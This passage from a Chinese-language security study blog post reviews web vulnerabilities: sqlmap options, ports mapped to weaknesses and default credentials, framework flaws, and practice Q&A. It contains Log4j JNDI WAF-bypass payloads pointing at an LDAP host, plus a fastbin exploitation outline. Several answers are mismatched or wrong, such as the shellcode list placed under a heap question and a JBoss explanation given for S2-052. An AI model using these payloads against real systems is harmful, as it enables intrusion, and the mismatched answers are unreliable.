<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">1.WebScanner：全站扫描，Web安全漏洞扫描</span><br><span class="line">2.Site Crawler：爬虫功能，遍历站点目录结构</span><br><span class="line">3.Target Finder：端口扫描，找出web服务器</span><br><span class="line">4.Subdomain Scanner：子域名扫描器，利用DNS查询</span><br><span class="line">5.Blind SQL Injector：盲注工具</span><br><span class="line">6.HTTP Editor：http协议数据包编辑器</span><br><span class="line">7.HTTP Sniffer：HTTP协议嗅探器</span><br><span class="line">8.HTTP Fuzzer：模糊测试工具</span><br><span class="line">9.Authentication Tester：Web认证破解工具</span><br><span class="line">10.Web Srevice Scanner：Web服务扫描器</span><br><span class="line">11.Web Srevice Editor：Web服务编辑器</span><br></pre></td></tr></table></figure>



<h3 id="10-sqlmap工具参数的使用和含义"><a href="#10-sqlmap工具参数的使用和含义" class="headerlink" title="10.sqlmap工具参数的使用和含义"></a>10.sqlmap工具参数的使用和含义</h3><ul>
<li><code>-v</code> 显示信息的级别，一共有六级：0：只显示python 错误和一些严重信息；1：显示基本信息（默认）；2：显示debug信息；3：显示注入过程的payload；4：显示http请求包；5：显示http响应头；7：显示http相应页面</li>
<li><code>-u</code>指定一个url连接，url中必须要有 <code>?xx=xxx</code> 才行</li>
<li><code>-r</code>可以呀将一个post请求方式的数据保存在一个txt中msqlmap会通过post方式检验目标</li>
<li><code>--data=Data</code>指明参数是哪些。例：<code>-u &quot;www.abc.com/index.php?id=1&quot; --data=&quot;name=1&amp;pass=2&quot;</code></li>
<li><code>--random-agent</code>使用随机user-agent进行测试。sqlmap有一个文件中储存了各种各样的user-agent，文件在<code>sqlmap/txt/user-agent.txt</code> <strong>在level&gt;&#x3D;3时会检测user-agent注入。</strong></li>
<li><code>--os-shell</code>创建一个对方操作系统的shell，metepreter或VNC</li>
<li><code>--cookie</code>指定测试时使用的cookie，通常在一些需要登录的站点会使用。例： <code>-u &quot;www.abc.com/index.php?id=1&quot;</code></li>
</ul>
<h3 id="11-一些常见漏洞"><a href="#11-一些常见漏洞" class="headerlink" title="11.一些常见漏洞"></a>11.一些常见漏洞</h3><h5 id="Tomcat"><a href="#Tomcat" class="headerlink" title="Tomcat"></a><strong>Tomcat</strong></h5><p>任意命令执行</p>
<p><a class="link"   target="_blank" rel="noopener" href="https://zhuanlan.zhihu.com/p/137686820" >https://zhuanlan.zhihu.com/p/137686820<i class="fas fa-external-link-alt"></i></a></p>
<h5 id="iis"><a href="#iis" class="headerlink" title="iis"></a>iis</h5><p>目录解析漏洞</p>
<p>文件名解析漏洞</p>
<p>畸形解析漏洞</p>
<p>iis短文件漏洞</p>
<p>PUT任意文件写入</p>
<p><a class="link"   target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_42918771/article/details/105178309" >https://blog.csdn.net/weixin_42918771/article/details/105178309<i class="fas fa-external-link-alt"></i></a></p>
<h5 id="apache"><a href="#apache" class="headerlink" title="apache"></a>apache</h5><p>换行解析漏洞，多后缀解析漏洞，http路径穿越漏洞</p>
<p>，路径穿越漏洞</p>
<p><a class="link"   target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_44268918/article/details/129129214" >https://blog.csdn.net/weixin_44268918/article/details/129129214<i class="fas fa-external-link-alt"></i></a></p>
<p><strong>Fastbin</strong></p>
<p>跟pwn有关，暂时没弄懂</p>
<p><a class="link"   target="_blank" rel="noopener" href="https://www.freebuf.com/articles/web/263598.html" >https://www.freebuf.com/articles/web/263598.html<i class="fas fa-external-link-alt"></i></a></p>
<h3 id="12-Cobalt-strike-mimikatz工具的一些基础知识"><a href="#12-Cobalt-strike-mimikatz工具的一些基础知识" class="headerlink" title="12.Cobalt strike,mimikatz工具的一些基础知识"></a>12.Cobalt strike,mimikatz工具的一些基础知识</h3><p>太多了，附上一个链接</p>
<p><a class="link"   target="_blank" rel="noopener" href="https://www.freebuf.com/articles/network/290134.html" >https://www.freebuf.com/articles/network/290134.html<i class="fas fa-external-link-alt"></i></a></p>
<h3 id="13-常见框架漏洞"><a href="#13-常见框架漏洞" class="headerlink" title="13.常见框架漏洞"></a>13.常见框架漏洞</h3><h5 id="Jboss"><a href="#Jboss" class="headerlink" title="Jboss"></a>Jboss</h5><ul>
<li><strong>访问控制不严导致的漏洞</strong></li>
<li><strong>反序列化导致的漏洞</strong></li>
</ul>
<p><a class="link"   target="_blank" rel="noopener" href="https://blog.csdn.net/m0_58434634/article/details/117434173" >https://blog.csdn.net/m0_58434634/article/details/117434173<i class="fas fa-external-link-alt"></i></a></p>
<h5 id="weblogic"><a href="#weblogic" class="headerlink" title="weblogic"></a>weblogic</h5><ul>
<li>弱口令漏洞</li>
<li>任意文件上传漏洞</li>
<li>XML Decoder反序列化漏洞</li>
<li>webligic-SSRF漏洞</li>
<li>java反序列化漏洞</li>
</ul>
<p><a class="link"   target="_blank" rel="noopener" href="https://www.cnblogs.com/-mo-/p/11503707.html" >https://www.cnblogs.com/-mo-/p/11503707.html<i class="fas fa-external-link-alt"></i></a></p>
<h5 id="thinkphp"><a href="#thinkphp" class="headerlink" title="thinkphp"></a>thinkphp</h5><ul>
<li>远程代码执行漏洞</li>
</ul>
<p><a class="link"   target="_blank" rel="noopener" href="https://www.cnblogs.com/lingzhisec/p/15728886.html" >https://www.cnblogs.com/lingzhisec/p/15728886.html<i class="fas fa-external-link-alt"></i></a></p>
<h5 id="Struts2"><a href="#Struts2" class="headerlink" title="Struts2"></a>Struts2</h5><p><a class="link"   target="_blank" rel="noopener" href="https://blog.csdn.net/HBohan/article/details/122667891" >https://blog.csdn.net/HBohan/article/details/122667891<i class="fas fa-external-link-alt"></i></a></p>
<h5 id="Shiro"><a href="#Shiro" class="headerlink" title="Shiro"></a>Shiro</h5><ul>
<li>反序列化漏洞</li>
</ul>
<p><a class="link"   target="_blank" rel="noopener" href="https://www.freebuf.com/vuls/283810.html" >https://www.freebuf.com/vuls/283810.html<i class="fas fa-external-link-alt"></i></a></p>
<h3 id="14-常见端口对应的漏洞"><a href="#14-常见端口对应的漏洞" class="headerlink" title="14.常见端口对应的漏洞"></a>14.常见端口对应的漏洞</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br></pre></td><td class="code"><pre><span class="line">20：FTP服务的数据传输端口</span><br><span class="line">21：FTP服务的连接端口，可能存在  弱口令暴力破解</span><br><span class="line">22：SSH服务端口，可能存在 弱口令暴力破解</span><br><span class="line">23：Telnet端口，可能存在 弱口令暴力破解</span><br><span class="line">25：SMTP简单邮件传输协议端口，和 POP3 的110端口对应</span><br><span class="line">43：whois服务端口</span><br><span class="line">53：DNS服务端口(TCP/UDP 53)</span><br><span class="line">67/68：DHCP服务端口</span><br><span class="line">69：TFTP端口，可能存在弱口令</span><br><span class="line">80：HTTP端口，常见web漏洞</span><br><span class="line">88：Kerberos协议端口</span><br><span class="line">110：POP3邮件服务端口，和SMTP的25端口对应</span><br><span class="line">135：RPC服务</span><br><span class="line">137/138： NMB服务</span><br><span class="line">139：SMB/CIFS服务</span><br><span class="line">143：IMAP协议端口</span><br><span class="line">161/162: Snmp服务，public弱口令</span><br><span class="line">389：LDAP目录访问协议，有可能存在注入、弱口令，域控才会开放此端口</span><br><span class="line">443：HTTPS端口，心脏滴血等与SSL有关的漏洞</span><br><span class="line">445：SMB服务端口，可能存在永恒之蓝漏洞MS17-010</span><br><span class="line">512/513/514：Linux Rexec服务端口，可能存在爆破</span><br><span class="line">636：LDAPS目录访问协议，域控才会开放此端口</span><br><span class="line">873：Rsync ，可能存在Rsync未授权访问漏洞，传送门：rsync 未授权访问漏洞</span><br><span class="line">1080：socket端口，可能存在爆破</span><br><span class="line">1099：RMI，可能存在 RMI反序列化漏洞</span><br><span class="line">1352：Lotus domino邮件服务端口，可能存在弱口令、信息泄露</span><br><span class="line">1414：IBM WebSphere MQ服务端口</span><br><span class="line">1433：SQL Server对外提供服务端口</span><br><span class="line">1434：用于向请求者返回SQL Server使用了哪个TCP/IP端口</span><br><span class="line">1521：oracle数据库端口</span><br><span class="line">2049：NFS服务端口，可能存在NFS配置不当</span><br><span class="line">2181：ZooKeeper监听端口，可能存在 ZooKeeper未授权访问漏洞</span><br><span class="line">2375：Docker端口，可能存在 Docker未授权访问漏洞</span><br><span class="line">2601:   Zebra ，默认密码zebr</span><br><span class="line">3128:   squid ，匿名访问（可能内网漫游)</span><br><span class="line">3268：LDAP目录访问协议，有可能存在注入、弱口令</span><br><span class="line">3306：MySQL数据库端口，可能存在 弱口令暴力破解</span><br><span class="line">3389：Windows远程桌面服务，可能存在 弱口令漏洞 或者 CVE-2019-0708 远程桌面漏洞复现</span><br><span class="line">3690：SVN服务，可能存在SVN泄漏，未授权访问漏洞</span><br><span class="line">4440：Rundeck，弱口令admin</span><br><span class="line">4560：log4j SocketServer监听的端口，可能存在 log4j&lt;=1.2.17反序列化漏洞（CVE-2019-17571）</span><br><span class="line">4750：BMC，可能存在 BMC服务器自动化RSCD代理远程代码执行(CVE-2016-1542)</span><br><span class="line">4848：GlassFish控制台端口，可能存在弱口令admin/adminadmin</span><br><span class="line">5000：SysBase/DB2数据库端口，可能存在爆破、注入漏洞</span><br><span class="line">5432：PostGreSQL数据库的端口</span><br><span class="line">5632：PyAnywhere服务端口，可能存在代码执行漏洞</span><br><span class="line">5900/5901：VNC监听端口，可能存在 VNC未授权访问漏洞</span><br><span class="line">5984：CouchDB端口，可能存在 CouchDB未授权访问漏洞</span><br><span class="line">6379：Redis数据库端口，可能存在Redis未授权访问漏洞，传送门：Redis未授权访问漏洞</span><br><span class="line">7001/7002：Weblogic，可能存在Weblogic反序列化漏洞，传送门：Weblogic反序列化漏洞</span><br><span class="line">7180：Cloudera manager端口</span><br><span class="line">8000：JDWP，可能存在JDWP远程代码执行漏洞。</span><br><span class="line">8069：Zabbix服务端口，可能存在Zabbix弱口令导致的Getshell漏洞</span><br><span class="line">8080：Tomcat、JBoss，可能存在Tomcat管理页面弱口令Getshell，JBoss未授权访问漏洞，传送门：Tomcat管理弱口令页面Getshell</span><br><span class="line">8080-8090：可能存在web服务</span><br><span class="line">8089：Jetty、Jenkins服务端口，可能存在反序列化，控制台弱口令等漏洞</span><br><span class="line">8161：Apache ActiveMQ后台管理系统端口，默认口令密码为：admin:admin ，可能存在CVE-2016-3088漏洞，传送门：Apache ActiveMQ任意文件写入漏洞（CVE-2016-3088）</span><br><span class="line">9000：fastcgi端口，可能存在远程命令执行漏洞</span><br><span class="line">9001：Supervisord，可能存在Supervisord远程命令执行漏洞(CVE-2017-11610)，传送门：Supervisord远程命令执行漏洞(CVE-2017-11610)</span><br><span class="line">9043/9090：WebSphere，可能存在WebSphere反序列化漏洞</span><br><span class="line">9200/9300：Elasticsearch监听端口，可能存在 Elasticsearch未授权访问漏洞</span><br><span class="line">10000：Webmin-Web控制面板，可能存在弱口令</span><br><span class="line">10001/10002：JmxRemoteLifecycleListener监听的，可能存在Tomcat反序列化漏洞，传送门：Tomcat反序列化漏洞(CVE-2016-8735)</span><br><span class="line">11211：Memcached监听端口，可能存在 Memcached未授权访问漏洞</span><br><span class="line">27017/27018：MongoDB数据库端口，可能存在 MongoDB未授权访问漏洞</span><br><span class="line">50000：SAP Management Console服务端口，可能存在 运程命令执行漏洞。</span><br><span class="line">50070：Hadoop服务端口，可能存在 Hadoop未授权访问漏洞</span><br><span class="line">61616：Apache ActiveMQ服务端口，可能存在 Apache ActiveMQ任意文件写入漏洞（CVE-2016-3088）复现</span><br><span class="line">60020：hbase.regionserver.port，HRegionServer的RPC端口</span><br><span class="line">60030：hbase.regionserver.info.port，HRegionServer的http端口</span><br><span class="line"></span><br></pre></td></tr></table></figure>





<h3 id="15-一些最新的漏洞"><a href="#15-一些最新的漏洞" class="headerlink" title="15.一些最新的漏洞"></a>15.一些最新的漏洞</h3><h5 id="Log4j2"><a href="#Log4j2" class="headerlink" title="Log4j2"></a>Log4j2</h5><p><a class="link"   target="_blank" rel="noopener" href="https://juejin.cn/post/7202514143341002789" >https://juejin.cn/post/7202514143341002789<i class="fas fa-external-link-alt"></i></a></p>
<h5 id="spring-core-rce-2022-03-29"><a href="#spring-core-rce-2022-03-29" class="headerlink" title="spring-core-rce-2022-03-29"></a>spring-core-rce-2022-03-29</h5><p><a class="link"   target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_45632448/article/details/124190382" >https://blog.csdn.net/weixin_45632448/article/details/124190382<i class="fas fa-external-link-alt"></i></a></p>
<h3 id="16-常见的web漏洞"><a href="#16-常见的web漏洞" class="headerlink" title="16.常见的web漏洞"></a>16.常见的web漏洞</h3><ul>
<li>任意文件上传</li>
<li>任意文件下载</li>
<li>逻辑漏洞</li>
<li>反序列化漏洞</li>
</ul>
<h3 id=""><a href="#" class="headerlink" title=""></a></h3><h2 id="-1"><a href="#-1" class="headerlink" title=""></a></h2><hr>
<h1 id="练习思考题"><a href="#练习思考题" class="headerlink" title="练习思考题"></a>练习思考题</h1><h3 id="1-堆溢出覆盖top-chunk的大小-house-of-force-的说法有哪些？"><a href="#1-堆溢出覆盖top-chunk的大小-house-of-force-的说法有哪些？" class="headerlink" title="1.堆溢出覆盖top chunk的大小(house of force)的说法有哪些？"></a>1.堆溢出覆盖top chunk的大小(house of force)的说法有哪些？</h3><ol>
<li>Windows Meterpreter Reverse TCP shellcode：这种 shellcode 可以与 Metasploit 的 Meterpreter 模块配合使用，实现远程代码执行、获取系统信息等功能。</li>
<li>Windows Reverse TCP shellcode：这种 shellcode 可以在 Windows 系统上运行，将一个远程 shell 连接回攻击者的主机。</li>
<li>Windows Reverse HTTP shellcode：这种 shellcode 可以在 Windows 系统上运行，将一个 HTTP 连接回攻击者的主机。</li>
<li>Beacon Payload shellcode：这种 shellcode 可以使用 Cobalt Strike 的 Beacon 功能，实现命令执行、文件传输等功能。</li>
<li>Linux Reverse TCP shellcode：这种 shellcode 可以在 Linux 系统上运行，将一个远程 shell 连接回攻击者的主机。</li>
<li>Mac Reverse TCP shellcode：这种 shellcode 可以在 Mac 系统上运行，将一个远程 shell 连接回攻击者的主机。</li>
</ol>
<h3 id="2-6379-8009端口对应的漏洞是"><a href="#2-6379-8009端口对应的漏洞是" class="headerlink" title="2.6379,8009端口对应的漏洞是"></a>2.6379,8009端口对应的漏洞是</h3><ul>
<li>6379是redis未授权访问漏洞</li>
<li>8009是<code>Apache-Tomcat-Ajp漏洞</code>，tomcat默认开启ajp服务（8009端口）</li>
</ul>
<h3 id="3-Cobalt-strike-可以生成哪些类型的shellcode"><a href="#3-Cobalt-strike-可以生成哪些类型的shellcode" class="headerlink" title="3.Cobalt strike 可以生成哪些类型的shellcode?"></a>3.Cobalt strike 可以生成哪些类型的shellcode?</h3><p>搜不到。。。</p>
<h3 id="4-Apache-文件解析漏洞的原理？"><a href="#4-Apache-文件解析漏洞的原理？" class="headerlink" title="4.Apache 文件解析漏洞的原理？"></a>4.Apache 文件解析漏洞的原理？</h3><blockquote>
<p>apache的解析漏洞依赖于一个特性：apache默认一个文件可以有多个以点分割的后缀，比如test.php.abc，当最右边的后缀无法识别（不在mime.types文件内），则继续向左识别，知道识别到合法后缀才能进行解析，与windows不同，apache对文件的名解析不是仅仅认识最后一个后缀名，而是从右向左，依此识别，直到遇到自己可以解析的文件为止。</p>
</blockquote>
<p>当phpinfo.php被禁止时，phpinfo.php.abc可执行</p>
<h3 id="5-什么中间件存在短文件名漏洞？"><a href="#5-什么中间件存在短文件名漏洞？" class="headerlink" title="5. 什么中间件存在短文件名漏洞？"></a>5. 什么中间件存在短文件名漏洞？</h3><p><strong>iis</strong></p>
<h3 id="6-xxe漏洞各个语言支持的伪协议有哪些"><a href="#6-xxe漏洞各个语言支持的伪协议有哪些" class="headerlink" title="6.xxe漏洞各个语言支持的伪协议有哪些"></a>6.xxe漏洞各个语言支持的伪协议有哪些</h3><p>可利用php:&#x2F;&#x2F;filter伪协议</p>
<h3 id="7-S2-052漏洞是由于什么造成的？"><a href="#7-S2-052漏洞是由于什么造成的？" class="headerlink" title="7.S2_052漏洞是由于什么造成的？"></a>7.S2_052漏洞是由于什么造成的？</h3><p>此漏洞主要是由于<strong>JBoss中 &#x2F;jmx-console&#x2F;HtmlAdaptor 路径对外开放</strong>，并且没有任何身份验证机制，导致攻击者可以进入到JMX控制台，并在其中执行任何功能。</p>
<h3 id="8-Weblogic-常见的漏洞有哪些？"><a href="#8-Weblogic-常见的漏洞有哪些？" class="headerlink" title="8.Weblogic 常见的漏洞有哪些？"></a>8.Weblogic 常见的漏洞有哪些？</h3><ul>
<li><strong>XMLDecoder反序列化漏洞</strong></li>
<li><strong>T3协议反序列化漏洞</strong></li>
<li><strong>未授权访问漏洞</strong></li>
<li><strong>命令执行漏洞</strong></li>
<li><strong>IIOP协议反序列化漏洞</strong></li>
<li><strong>SSRF漏洞</strong></li>
</ul>
<h3 id="9-Jboss-常见的漏洞有哪些？"><a href="#9-Jboss-常见的漏洞有哪些？" class="headerlink" title="9.Jboss 常见的漏洞有哪些？"></a>9.Jboss 常见的漏洞有哪些？</h3><ul>
<li><strong>访问控制不严导致的漏洞</strong></li>
<li><strong>反序列化导致的漏洞</strong></li>
</ul>
<h3 id="10-Struts2-常见的漏洞有哪些？"><a href="#10-Struts2-常见的漏洞有哪些？" class="headerlink" title="10.Struts2 常见的漏洞有哪些？"></a>10.Struts2 常见的漏洞有哪些？</h3><ul>
<li>反序列化漏洞</li>
</ul>
<h3 id="11-Fastbin-怎么利用？"><a href="#11-Fastbin-怎么利用？" class="headerlink" title="11.Fastbin 怎么利用？"></a>11.Fastbin 怎么利用？</h3><p>使用流程如下：</p>
<ol>
<li>申请同样大小的两个内存块，并将它们都释放，这样这两个内存块就会被放入 Fastbin 链表中。</li>
<li>重新申请同样大小的内存块，此时 glibc 会从 Fastbin 链表中返回其中一个内存块的地址，作为本次申请的内存块。</li>
<li>利用本次申请返回的内存块地址，修改其中保存的值为 Fastbin 链表中未释放的内存块的地址。</li>
<li>再次申请同样大小的内存块，此时 glibc 会从 Fastbin 链表中返回之前修改过的内存块地址，作为本次申请的内存块。</li>
</ol>
<h3 id="12-Ssrf-攻击的目标为？"><a href="#12-Ssrf-攻击的目标为？" class="headerlink" title="12.Ssrf 攻击的目标为？"></a>12.Ssrf 攻击的目标为？</h3><p><strong><u>外网无法访问的内部系统</u></strong></p>
<h3 id="13-ssrf-是否可以通过过滤get或post参数进行防御？"><a href="#13-ssrf-是否可以通过过滤get或post参数进行防御？" class="headerlink" title="13.ssrf 是否可以通过过滤get或post参数进行防御？"></a>13.ssrf 是否可以通过过滤get或post参数进行防御？</h3><p>不行</p>
<h3 id="14-Log4j-怎么绕过？"><a href="#14-Log4j-怎么绕过？" class="headerlink" title="14.Log4j 怎么绕过？"></a>14.Log4j 怎么绕过？</h3><ul>
<li><p><strong>不出现port，避免被waf匹配ip:port</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">$&#123;jndi:ldap:192.168.1.1/a&#125;</span><br><span class="line"> $&#123;jndi:ldap:192.168.1.1:/a&#125; </span><br><span class="line">注意此时需要ldap服务端口为389</span><br><span class="line"></span><br></pre></td></tr></table></figure>


</li>
<li><p><strong>对IP添加包裹</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">$&#123;jndi:ldap://[192.168.34.96]/a&#125; </span><br><span class="line">$&#123;jndi:ldap://[192.168.34.96]]/a&#125; </span><br><span class="line"> LdapURL取出&quot;[ip]&quot;，LdapCtx去除[]获得ip，两种情况下端口都是389</span><br><span class="line"></span><br></pre></td></tr></table></figure></li>
</ul>
<h3 id="15-ogg是否是php的伪协议？"><a href="#15-ogg是否是php的伪协议？" class="headerlink" title="15.ogg是否是php的伪协议？"></a>15.ogg是否是php的伪协议？</h3><p>不是。OGG是一种开放格式的媒体容器，通常用于存储音频和视频文件。它不是PHP的伪协议，PHP的伪协议是一种特殊的协议，用于在PHP中访问各种资源，如文件、网络资源等。PHP的伪协议以特殊的前缀开头，例如file:&#x2F;&#x2F;表示文件协议，http:&#x2F;&#x2F;表示HTTP协议等。</p>
<h3 id="16-Zip-伪协议利用对应的php版本号为？"><a href="#16-Zip-伪协议利用对应的php版本号为？" class="headerlink" title="16. Zip:&#x2F;&#x2F;伪协议利用对应的php版本号为？"></a>16. Zip:&#x2F;&#x2F;伪协议利用对应的php版本号为？</h3><p><code>zip://</code> 伪协议是在 PHP 5.2.0 版本中引入的，因此在该版本及更高版本的 PHP 中都可以使用。该伪协议允许 PHP 脚本以与本地文件系统相同的方式访问 ZIP 存档文件中的文件。</p>
<h3 id="17-文件上传怎么绕过黑名单-asp后缀的过滤？"><a href="#17-文件上传怎么绕过黑名单-asp后缀的过滤？" class="headerlink" title="17.文件上传怎么绕过黑名单.asp后缀的过滤？"></a>17.文件上传怎么绕过黑名单.asp后缀的过滤？</h3><h3 id="18-Nginx-apache是否存在弱口令？"><a href="#18-Nginx-apache是否存在弱口令？" class="headerlink" title="18.Nginx,apache是否存在弱口令？"></a>18.Nginx,apache是否存在弱口令？</h3><p>均存在</p>
<h3 id="19-Dom-xss和反射型xss的区别是什么？"><a href="#19-Dom-xss和反射型xss的区别是什么？" class="headerlink" title="19.Dom xss和反射型xss的区别是什么？"></a>19.Dom xss和反射型xss的区别是什么？</h3><blockquote>
<p>DOM 型 XSS 漏洞和反射型 XSS 漏洞的区别在于攻击者注入恶意脚本的位置不同。反射型 XSS 漏洞将恶意脚本注入到响应页面中，而 DOM 型 XSS 漏洞将恶意脚本注入到浏览器的 DOM 中。</p>
</blockquote>
<h3 id="20-Ms17-010漏洞是那个端口造成的？"><a href="#20-Ms17-010漏洞是那个端口造成的？" class="headerlink" title="20.Ms17_010漏洞是那个端口造成的？"></a>20.Ms17_010漏洞是那个端口造成的？</h3><p>445端口</p>
<h3 id="21-Sqlmap-中要使用随机user-agent应该使用什么参数？"><a href="#21-Sqlmap-中要使用随机user-agent应该使用什么参数？" class="headerlink" title="21.Sqlmap 中要使用随机user-agent应该使用什么参数？"></a>21.Sqlmap 中要使用随机user-agent应该使用什么参数？</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">--random-agent</span><br></pre></td></tr></table></figure>



<h3 id="22-Xp-cmdshell-是那个数据库中含有的？"><a href="#22-Xp-cmdshell-是那个数据库中含有的？" class="headerlink" title="22.Xp_cmdshell 是那个数据库中含有的？"></a>22.Xp_cmdshell 是那个数据库中含有的？</h3><p><code> Microsoft SQL Server 数据库</code></p>
<h3 id="23-Symlink函数是否可以执行系统命令？"><a href="#23-Symlink函数是否可以执行系统命令？" class="headerlink" title="23.Symlink函数是否可以执行系统命令？"></a>23.Symlink函数是否可以执行系统命令？</h3><p>不可以</p>
<h3 id="24-Samba-wannacry溢出漏洞怎么修复？"><a href="#24-Samba-wannacry溢出漏洞怎么修复？" class="headerlink" title="24.Samba wannacry溢出漏洞怎么修复？"></a>24.Samba wannacry溢出漏洞怎么修复？</h3><ul>
<li>升级 Samba：升级到最新版本的 Samba，这将修复许多与安全有关的漏洞，包括 EternalBlue 漏洞。</li>
<li>禁用 SMBv1：在 Samba 服务器上禁用 SMBv1 协议。这是因为 WannaCry 利用的是 SMBv1 协议的漏洞。在 Windows 系统上禁用 SMBv1 协议同样可以减少系统受到攻击的风险。</li>
<li>更新操作系统：更新 Windows 操作系统以修补 SMBv1 漏洞。</li>
<li>加强安全设置：加强 Samba 服务器的安全设置，包括访问控制、身份验证和日志记录等。例如，可以配置防火墙规则以限制对 Samba 服务器的访问，并配置强密码策略以增强身份验证的安全性。</li>
<li>实施安全性检查：定期对 Samba 服务器进行安全性检查，以确保其处于最新的安全状态，并及时修复发现的漏洞。</li>
</ul>

                </div>
                
                        
<div class="post-copyright-info-container border-box">
    <div class="copyright-info-content border-box">
        <div class="copyright-info-top border-box">
            <div class="copyright-post-title border-box text-ellipsis">
                web漏洞复习
            </div>

            <div class="copyright-post-link border-box text-ellipsis">
                2022/03/10/web漏洞复习/
            </div>
        </div>

        <div class="copyright-info-bottom border-box">
            <div class="copyright-post-author bottom-item">
                <div class="type">
                    作者
                </div>
                <div class="content">P1taya</div>
            </div>

            <div class="post-time bottom-item">
                <div class="type">
                    发布于
                </div>
                <div class="content">2022-03-10 23:21</div>
            </div>


            <div class="post-license bottom-item">
                <div class="type">
                    许可
                </div>
                <div class="content tooltip" data-tooltip-content="CC BY-NC-SA 4.0">
                    <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh-hans" target="_blank">
                        
                            <i class="fa-brands fa-creative-commons"></i>
                            <i class="fa-brands fa-creative-commons-by"></i>
                            <i class="fa-brands fa-creative-commons-nc"></i>
                            <i class="fa-brands fa-creative-commons-sa"></i>
                        
                    </a>
                </div>
            </div>
        </div>

        <i class="copyright-bg fa-solid fa-copyright"></i>
    </div>
    <div class="copy-copyright-info flex-center tooltip" data-tooltip-content="复制版权信息" data-tooltip-offset-y="-2px">
        <i class="fa-solid fa-copy"></i>
    </div>
</div>

                

                <div class="post-bottom-tags-and-share border-box">
                    <div>
                        
                    </div>
                    <div>
                        
                    </div>
                </div>

                

                
                    <div class="post-nav border-box">
                        
                            <div class="prev-post">
                                <a class="prev"
                                   rel="prev"
                                   href="/2022/03/21/PHP%E7%89%B9%E6%80%A7/"
                                   title="PHP特性"
                                >
                                    <span class="left arrow-icon flex-center">
                                        <i class="fas fa-chevron-left"></i>
                                    </span>
                                    <span class="title flex-center">
                                        <span class="post-nav-title-item text-ellipsis">PHP特性</span>
                                        <span class="post-nav-item">上一篇</span>
                                    </span>
                                </a>
                            </div>
                        
                        
                            <div class="next-post">
                                <a class="next"
                                   rel="next"
                                   href="/2022/01/13/%E6%B5%85%E6%9E%90JWT/"
                                   title="浅析JWT"
                                >
                                    <span class="title flex-center">
                                        <span class="post-nav-title-item text-ellipsis">浅析JWT</span>
                                        <span class="post-nav-item">下一篇</span>
                                    </span>
                                    <span class="right arrow-icon flex-center">
                                        <i class="fas fa-chevron-right"></i>
                                    </span>
                                </a>
                            </div>
                        
                    </div>
                

                
                    






                
            </div>
        </div>

        
            <div class="pc-post-toc right-toc">
                <div class="post-toc-wrap border-box">
    <div class="post-toc border-box">
        <ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#web%E6%BC%8F%E6%B4%9E%E5%A4%8D%E4%B9%A0"><span class="nav-text">web漏洞复习</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1-owasp-top-10"><span class="nav-text">1.owasp top 10</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-sql%E6%B3%A8%E5%85%A5"><span class="nav-text">2.sql注入</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3-%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0"><span class="nav-text">3.文件上传</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3-SSRF%E6%BC%8F%E6%B4%9E"><span class="nav-text">3.SSRF漏洞</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#4-XXE%E6%BC%8F%E6%B4%9E"><span class="nav-text">4.XXE漏洞</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#5-%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E"><span class="nav-text">5.文件包含漏洞</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#6-Php%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%EF%BC%8Cphp%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E7%9B%B8"><span class="nav-text">6.Php命令执行，php代码执行相</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" 